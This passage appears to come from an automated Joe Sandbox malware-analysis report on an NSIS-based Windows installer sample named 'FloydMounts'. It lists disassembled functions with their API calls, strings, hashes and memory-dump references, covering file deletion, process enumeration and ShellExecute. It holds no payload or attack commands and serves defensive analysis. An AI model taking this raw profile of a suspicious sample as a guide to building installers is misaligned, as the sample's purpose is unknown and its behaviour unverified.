                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $ @$M$N
                                                                                              • API String ID: 1638840714-3479655940
                                                                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                              Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                              Strings
                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                              • \*.*, xrefs: 00406D2F
                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                              • ptF, xrefs: 00406D1A
                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                              • API String ID: 2035342205-1650287579
                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                              Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                              • String ID: F$A
                                                                                              • API String ID: 3347642858-1281894373
                                                                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                              Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                              • API String ID: 1916479912-1189179171
                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                              Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406A73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 3581403547-1792361021
                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                              Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                              Strings
                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                              • API String ID: 542301482-1377821865
                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                              Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                              Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                              Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                              • API String ID: 20674999-2124804629
                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                              Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                              • String ID: F$N$open
                                                                                              • API String ID: 3928313111-1104729357
